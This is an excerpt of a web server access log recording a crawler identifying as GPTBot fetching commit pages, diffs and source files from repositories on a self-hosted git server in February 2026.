[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:12:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 387643] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:12:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 190970] [Gzip 11.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:12:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 34235] [Gzip 7.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:12:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 106842] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:12:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 188111] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:12:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 400215] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:12:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 23173] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:12:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 17425] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:12:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 17085] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:12:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 17055] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:12:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 174784] [Gzip 16.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:12:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 196532] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 137209] [Gzip 14.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 34280] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 14390] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 188155] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 57787] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 23196] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 86375] [Gzip 15.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 212863] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" [Client 74.7.227.38] [Length 51922] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 400463] [Gzip 13.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 196575] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" +[17/Feb/2026:13:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 136875] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" [Client 74.7.227.38] [Length 28926] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 11695] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" [Client 74.7.227.38] [Length 10283] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 62464] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 57836] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 191681] [Gzip 11.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 229610] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:13:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 56761] [Gzip 12.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 188157] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 204105] [Gzip 13.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 188184] [Gzip 11.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 77647] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:00:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 9855] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" [Client 74.7.227.38] [Length 1089] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:13:00:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:13:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 136885] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:00:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 150532] [Gzip 17.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:00:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 136878] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 24371] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:00:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 23186] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 23185] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:13:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 15584] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 77475] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" [Client 74.7.227.38] [Length 857644] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 115878] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" +[17/Feb/2026:13:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e.diff" [Client 74.7.227.38] [Length 268508] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 28975] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 106877] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" [Client 74.7.227.38] [Length 17031] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 34285] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 34282] [Gzip 7.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" +[17/Feb/2026:13:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 36008] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" [Client 74.7.227.38] [Length 22180] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15642] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15644] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 